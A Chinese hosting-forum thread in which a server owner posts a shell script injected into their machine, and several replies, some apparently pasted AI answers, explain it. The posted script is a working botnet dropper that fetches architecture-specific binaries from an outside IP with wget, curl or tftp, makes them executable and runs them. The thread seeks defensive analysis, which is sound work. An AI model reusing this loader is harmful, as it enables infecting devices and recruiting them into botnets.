主机论坛

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 182|回复: 13

有人往我服务器里注入脚本,有能看明白是啥意思的不

[复制链接]

262

主题

921

帖子

2628

积分

金牌会员

Rank: 6Rank: 6

积分
2628
发表于 2024-4-24 15:48:04 | 显示全部楼层 |阅读模式
  1. binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
  2. server_ip="103.163.214.97"
  3. binout="lib"
  4. exec="your device just got infected to a bootnoot"

  5. rm -rf $binout
  6. for arch in $binarys
  7. do
  8. rm -rf $arch
  9. cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
  10. chmod 777 $binout
  11. status=`./$binout $1`
  12. if [ "$status" = "$exec" ]; then
  13.         rm -rf $binout
  14.         break
  15. fi
  16. rm -rf $binout
  17. done
复制代码
回复

使用道具 举报

3

主题

137

帖子

355

积分

中级会员

Rank: 3Rank: 3

积分
355
发表于 2024-4-24 15:49:37 | 显示全部楼层
根据您提供的代码片段,这段代码看起来像是一个简单的 Bash 脚本。让我解释一下这段代码的大致功能:

1. 首先,定义了一些变量:
   - `binarys`:包含一系列架构的名称,如"MIPS"、"x86"、"ARM"等。
   - `server_ip`:指定了服务器的 IP 地址。
   - `binout`:指定了输出的文件名。
   - `exec`:包含一个字符串,即执行的消息。

2. 接着,脚本执行了一系列操作:
   - 删除了名为 `$binout` 的文件。
   - 使用 `for` 循环遍历 `$binarys` 中的架构名称。
   - 在循环中,脚本尝试从服务器下载特定架构的文件,并保存为 `$binout` 文件。
   - 更改了 `$binout` 的权限为可执行。
   - 运行了 `$binout` 文件,并将输出存储在 `status` 变量中。
   - 如果 `status` 的值等于 `$exec`,则删除 `$binout` 文件并终止循环。

3. 最后,无论条件是否满足,都会删除 `$binout` 文件。

需要注意的是,这段代码看起来像是一个恶意脚本,因为它尝试从远程服务器下载文件并执行,而且在执行时删除了一些文件。这种行为可能会导致设备被感染或受到损害。

如果这段代码不是您编写的,建议不要运行它,因为它可能会对您的设备造成危害。如果您需要帮助分析或理解其他代码,请随时告诉我,我将竭尽所能提供帮助。
回复

使用道具 举报

1

主题

14

帖子

41

积分

新手上路

Rank: 1

积分
41
发表于 2024-4-24 15:49:53 | 显示全部楼层
这个脚本看起来像是一个恶意软件传播工具,它的作用如下:

变量设置:
binarys:列出了一系列架构的名称,包括 MIPS、MPSL、x86、ARM 等。
server_ip:指定了一个服务器的 IP 地址。
binout:指定了一个输出文件的名称。
exec:包含了一条恶意消息,提示设备已经被感染。
文件操作:
rm -rf $binout:删除名为 $binout 的文件或目录。
rm -rf $arch:在循环开始之前删除了可能存在的不同架构的文件或目录。
cd /tmp || cd /var || cd /dev:尝试进入 /tmp、/var 或 /dev 目录,如果其中一个目录不存在则尝试下一个。
wget、curl 或 tftp:从指定的 $server_ip 地址下载不同架构的文件,并命名为 $binout。
权限设置:
chmod 777 $binout:将下载的文件 $binout 的权限设置为 777,即可执行。
执行:
status=./$binout $1``:运行下载的文件,并将结果存储在 status 变量中。
检查结果:
如果执行结果与 exec 变量中的消息相匹配,即设备已被感染,则删除下载的文件 $binout 并退出循环。
循环结束:
如果没有发现设备被感染的迹象,则继续循环删除 $binout 文件并尝试下载其他架构的文件。
总体来说,这个脚本的目的似乎是尝试下载不同架构的恶意文件,并在本地执行,如果设备被感染,则停止执行并删除下载的文件。
回复

使用道具 举报

13

主题

445

帖子

1403

积分

金牌会员

Rank: 6Rank: 6

积分
1403
发表于 2024-4-24 15:51:09 | 显示全部楼层
## 代码分析:

这段代码的作用是尝试在目标设备上执行一个bootkit程序,使其感染设备。它会依次尝试不同的CPU架构,下载对应的bootkit程序并执行,直到成功感染设备。

**以下是代码的详细分析:**

1. **定义变量:**
    - `binarys`:包含一系列CPU架构名称的字符串,如mips、x86、arm等。
    - `server_ip`:存放bootkit程序所在服务器的IP地址。
    - `binout`:下载的bootkit程序文件名,设置为"lib"。
    - `exec`:bootkit程序执行成功后的预期输出字符串,即"your device just got infected to a bootnoot"。

2. **删除已有文件:**
    - `rm -rf $binout`:删除已存在的"lib"文件。

3. **循环遍历CPU架构:**
    - 使用`for`循环遍历`binarys`变量中存储的每个CPU架构名称。

4. **下载bootkit程序:**
    - 进入`/tmp`、`/var`或`/dev`目录(尝试不同的目录,以确保下载成功)。
    - 使用`wget`、`curl`或`tftp`命令从服务器下载对应架构的bootkit程序,并保存为"lib"文件。
    - 使用`chmod 777`命令赋予"lib"文件可执行权限。

5. **执行bootkit程序:**
    - 使用`./$binout $1`命令执行"lib"文件,并将第一个参数传递给它。
    - 将执行结果保存到`status`变量中。

6. **检查执行结果:**
    - 使用`if`语句判断`status`变量的值是否等于`exec`变量的值。
    - 如果相等,说明bootkit程序执行成功,设备已被感染。

7. **清理:**
    - 删除"lib"文件。
    - 使用`break`语句跳出循环,因为已经成功感染设备。

8. **循环结束:**
    - 如果循环结束时仍未成功感染设备,说明所有尝试的CPU架构都不匹配或下载/执行失败。

## 总结:

这段代码是一个恶意脚本,旨在感染目标设备并植入bootkit程序。它利用了不同CPU架构的兼容性,并尝试多种下载方式,以提高成功率。

这是Gemini 1.5 Pro的回答
回复

使用道具 举报

8

主题

204

帖子

662

积分

高级会员

Rank: 4

积分
662
发表于 2024-4-24 16:51:51 | 显示全部楼层
下载下脚本来全是黑框
回复

使用道具 举报

18

主题

286

帖子

658

积分

高级会员

Rank: 4

积分
658
发表于 2024-4-24 16:59:54 | 显示全部楼层
这个脚本看起来像是一个恶意软件传播工具,它的作用如下:

变量设置:
binarys:列出了一系列架构的名称,包括 MIPS、MPSL、x86、ARM 等。
server_ip:指定了一个服务器的 IP 地址。
binout:指定了一个输出文件的名称。
exec:包含了一条恶意消息,提示设备已经被感染。
文件操作:
rm -rf $binout:删除名为 $binout 的文件或目录。
rm -rf $arch:在循环开始之前删除了可能存在的不同架构的文件或目录。
cd /tmp || cd /var || cd /dev:尝试进入 /tmp、/var 或 /dev 目录,如果其中一个目录不存在则尝试下一个。
wget、curl 或 tftp:从指定的 $server_ip 地址下载不同架构的文件,并命名为 $binout。
权限设置:
chmod 777 $binout:将下载的文件 $binout 的权限设置为 777,即可执行。
执行:
status=./$binout $1``:运行下载的文件,并将结果存储在 status 变量中。
检查结果:
如果执行结果与 exec 变量中的消息相匹配,即设备已被感染,则删除下载的文件 $binout 并退出循环。
循环结束:
如果没有发现设备被感染的迹象,则继续循环删除 $binout 文件并尝试下载其他架构的文件。
总体来说,这个脚本的目的似乎是尝试下载不同架构的恶意文件,并在本地执行,如果设备被感染,则停止执行并删除下载的文件。
回复

使用道具 举报

3

主题

98

帖子

307

积分

中级会员

Rank: 3Rank: 3

积分
307
发表于 2024-4-24 17:05:05 | 显示全部楼层
简单说就是从别人服务器下载可能有危害的程序文件到你的机器,然后在你的机器上运行
回复

使用道具 举报

4

主题

607

帖子

1906

积分

金牌会员

Rank: 6Rank: 6

积分
1906
发表于 2024-4-24 17:08:06 | 显示全部楼层
几个叼毛不懂可以不要回,一堆gpt回复看了就恶心
回复

使用道具 举报

17

主题

1004

帖子

2479

积分

金牌会员

Rank: 6Rank: 6

积分
2479
发表于 2024-4-24 17:47:55 | 显示全部楼层
ceplavia 发表于 2024-4-24 17:08
几个叼毛不懂可以不要回,一堆gpt回复看了就恶心

ai就是傻逼 一堆废话 我就没明白ai除了这些垃圾还能干啥
回复

使用道具 举报

0

主题

1

帖子

4

积分

新手上路

Rank: 1

积分
4
发表于 2024-4-24 17:08:00 | 显示全部楼层
通过漏洞运行的远程执行命令,感觉拉的文件应该是漏洞内核和提权应用被拉到僵尸网络当肉鸡打D了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|主机论坛

GMT+8, 2024-5-5 19:09 , Processed in 0.098028 second(s), 18 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表